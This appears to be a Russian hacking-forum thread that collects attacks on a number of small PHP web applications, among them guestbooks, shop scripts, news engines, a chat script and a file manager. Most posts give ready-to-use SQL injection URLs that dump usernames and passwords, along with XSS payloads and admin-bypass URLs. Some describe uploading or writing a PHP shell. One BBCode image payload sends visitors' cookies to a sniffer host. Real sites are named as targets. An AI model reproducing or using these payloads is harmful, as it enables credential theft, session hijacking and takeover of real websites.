![]() |
Amiro.CMS
Активная хсс в гостевой, уязвимы поля "Заголовок:" и "Сообщение:" Искать "Работает на: система управления сайтом Amiro CMS" |
Бесплатные движки инет-магазинов:
1. myInvoice 1 SQL инъекция: Код:
http://site.ru/invoice.php?id='+union+select+1,2,3,4,5,6/*Код:
http://site.ru/invoice.php?id='+union+select+1,2,3,convert(concat(clientid,char(58),name,char(58),password,char(58),email),char),5,6+from+clients/*2. Shop-Script Free SQL инъекция: Код:
http://site.ru/index.php?CID=-1+union+select+1,2/*3. Pricelistme! 1 SQL инъекция: Код:
http://site.ru/one_index_product.php?loginis=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*--------------------------------------------------- Календари и органайзеры: 1. Geo-Contacts 1.1 SQL инъекция: Код:
http://site.ru/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*Пассивная XSS: Код:
http://site.ru/include/inc.footer.php?abook_vers=<script>alert();</script>SQL инъекция: Код:
http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*--------------------------------------------------- Игры: 1. 100 Question Simple Trivia Script 1 SQL инъекция: Код:
http://site.ru/trivia.php?trivia_id=-1+union+select+1,2,3,4,5/* |
Гостевые книги:
1. EzGuestBook 1.1 1) Активные XSS: При создание сообщения в поля Name, E-Mail, Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке. 2) SQL инъекция: Код:
http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*Код:
http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password),2,3,4,5+from+ez_guestbook_auth/*Активная XSS: При создание сообщения в поле Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений. 3. ParkerGuestbook v4.00 Add moderators Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль. Угадать логин проще - к примеру стандартный логин admin, его могут не поменять. Доступ к админке, имя только логин: http://site.ru/admin.php?adminlogin=grey&logged=1 Доступ к админке, имя только пароль: http://site.ru/admin.php?adminpass=123&logged=1 4. ParkerGuestbook v2.00 Активные XSS: При создание сообщения в поля Имя, Сайт, ICQ, Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений. |
Гостевые книги:
1. NEOgeN GuestBook 1.2 1) Активная XSS: При добавление сообщения в поле Ваше Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений. 2) Пасивная XSS: Код:
http://site.ru/footer.php?GBookTitle=<script>alert();</script>Активная XSS: При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений. 3. Trofimov book v1.0 Из-за отсутствия условия входа в админку, можно получить достп в админку: http://site.ru/gb.php?action=admin 4. Rzhavin FAQ 1.0 1) Из-за не коректного условия входа в админку, можно получить частичный достп в админку: http://site.ru/admin.php?showform=1 2) Активная XSS: При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений. 5. spiderLog 1.0 Активные XSS: При добавление сообщения в поля Name, E-mail Address, City, State / Province, Country вписываем скрипт, скрипт будет выполняться при просмотре сообщений. 6. Filebased Guestbook 1.0.1 Активные XSS: При добавление сообщения в поля Name, Comment вписываем скрипт, скрипт будет выполняться при просмотре сообщений. |
Новостные двиги:
1. CuteNews rus v025 Пасивная XSS: Код:
http://site.ru/example2.php?dosearch=yes&story="><script>alert();</script>Активные XSS: При добавление комментария в сообщение в поля Имя и Сообщение вписываем скрипт, скрипт будет выполняться при просмотре коментариев. 3. pagenews 1.0 1) SQL инъекция: Код:
http://site.ru/insert.php?id='+union+select+1/*При загрузке файлов на сайт, расширение файла не проверяется. Загружаются файлы в директрию uploads: http://site.ru/uploads/shell.php 4. Sunny's Simple Diary SQL инъекция: Код:
http://site.ru/index.php?month='+union+select+1,2,3/*1) Свободный доступ в админку: http://site.ru/newsadmin.php 2) Активная XSS: При добавление новости в поле News вписываем скрипт. 3) SQL инъекция: Код:
http://site.ru/newscontent.php?action=edit&id='+union+select+1,2,3/* |
Цитата:
А можно перейти по ссылке www.сайт.ru/gb/passwd.dat и перед нами будет: <?php $Password['логин'] = "хеш пароля"; ?> пример http://www.ivanovo.ac.ru/win1251/fac_phys/admin.php еще прикольная фишка там со знаком "|" попробуйте вставлять его в поля разные. |
e107 (какая версия не знаю, но не 7.8)
Этот текст можно вставлять в сообщение на форуме, в комментарий к новости, в личное сообщение. [img]http://<путь к картинке>'onload=i=new/**/Image();i.src=unescape('%68%74%74...')+document.co okie;'[/img] где %68%74%74... - закодированный путь к снифферу со знаком вопроса в конце. |
На днях нашел. :)
BlaB! Lite 2.2 Скрипт для полноценного чата на PHP Активная XSS: .................................................. ....................... Уязвимость существует из-за недостаточной обработки входных данных в поле "Nickname:" в сценарии login.php: В поле "Nickname:" пишем: Код:
<SCRIPT>alert(document.cookie)</SCRIPT>Входим,отправляем сообщение,видим знакомый алерт();! ;) ____________________________________ Подмена IP-адреса: .................................................. ....................... В поле "Nickname:" пишем: Код:
Желаемое имя:|:Ваше сообщение:|:Любой IP-адрес(содержание не важно!). Таким образом в базу заносится не ваш IP-адрес, а тот который вы указали! Пример: http://zeus.aegee.org/cdstuff/chat _____________________________________ ********************************* |
Скрипт знакомств:
Интим-услуги Nevius 1) Пасивная XSS: Код:
http://site.ru/list.php?g=<script>alert();</script>Код:
http://site.ru/list.php?g=&link=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*Код:
http://site.ru/list.php?g=&link=-1+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users/* |
PHP Advanced Transfer Manager Full version: 1.30
Скрипт очень дырявый, в нём еще локальный инклуд файлов находили: http://forum.antichat.ru/showpost.ph...62&postcount=8 а вот про xss вроде не было: Пасивные XSS: viewers/txt.php Код:
http://site.ru/viewers/txt.php?filename=<script>alert();</script>Код:
http://site.ru/viewers/jpg.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/jpeg.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/gif.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/bmp.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/png.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/swf.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/mov.php?filename="><script>alert();</script>Код:
http://site.ru/viewers/tif.php?filename="><script>alert();</script>------------------ В админке заходим в конфигурацию (Admin: Configure Upload Center) Там можно редактивровать файлы: footer.htm header.htm info.htm mailinfo.htm В любой из них вписываем шелл. Главное что бы файлы с расширением .htm выполнялись как php. |
| Время: 02:02 |